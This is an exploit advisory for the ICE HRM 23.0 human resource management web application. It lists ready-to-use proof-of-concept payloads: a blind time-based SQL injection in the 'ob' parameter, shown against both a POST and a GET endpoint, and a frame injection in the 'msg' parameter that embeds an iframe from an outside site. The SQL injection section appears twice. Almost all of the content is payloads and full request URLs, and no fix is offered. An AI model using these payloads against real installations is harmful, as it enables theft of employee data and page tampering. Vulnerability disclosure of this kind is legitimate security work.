ICE HRM 23.0 - Multiple Vulnerabilities

2019-03-15 16:05:10

===========================================================================================
# Exploit Title: ICE HRM - ’ob’ SQL Inj.
# Dork: N/A
# Date: 14-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://icehrm.org
# Software Link: https://sourceforge.net/projects/icehrm/
# Version: v23.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: ICE Hrm is a Human resource management system for
small and medium sized organizations.
It has a rich UI built with PHP and Java Script.
===========================================================================================
# POC - SQLi (blind)
# Parameters : ob
# Attack Pattern :
1+++((SELECT+1+FROM+(SELECT+SLEEP(25))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR"*/
# POST Method : http://localhost/icehrmv23OS/app/service.php
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: ICE HRM - ’ob’ SQL Inj.
# Dork: N/A
# Date: 14-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://icehrm.org
# Software Link: https://sourceforge.net/projects/icehrm/
# Version: v23.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: ICE Hrm is a Human resource management system for
small and medium sized organizations.
It has a rich UI built with PHP and Java Script.
===========================================================================================
# POC - SQLi (blind)
# Parameters : ob
# Attack Pattern :
1+++((SELECT+1+FROM+(SELECT+SLEEP(25))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR"*/
# GET Method :
http://localhost/icehrmv23OS/app/data.php?t=Employee&sm={"nationality":["Nationality","id","name"],"ethnicity":["Ethnicity","id","name"],"immigration_status":["ImmigrationStatus","id","name"],"employment_status":["EmploymentStatus","id","name"],"job_title":["JobTitle","id","name"],"pay_grade":["PayGrade","id","name"],"country":["Country","code","name"],"province":["Province","id","name"],"department":["CompanyStructure","id","title"],"supervisor":["Employee","id","first_name last_name"]}&cl=["id","image","employee_id","first_name","last_name","mobile_phone","department","gender","supervisor"]&ft={"status":"Active"}&ob=1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/
===========================================================================================

===========================================================================================
# Exploit Title: ICE HRM - ’msg’ Frame Inj.
# Dork: N/A
# Date: 14-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://icehrm.org
# Software Link: https://sourceforge.net/projects/icehrm/
# Version: v23.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: ICE Hrm is a Human resource management system for
small and medium sized organizations.
It has a rich UI built with PHP and Java Script.
===========================================================================================
# POC - Frame Inj.
# Parameters : msg
# Attack Pattern : /?">
# GET Method :
http://localhost/icehrmv23OS/app/fileupload_page.php?id=_id_&msg=<iframe
src="http://cyber-warrior.org/
?"></iframe>&file_group=_file_group_&file_type=_file_type_&user=_user_
===========================================================================================

Fixes

No fixes

In order to submit a new fix you need to be registered.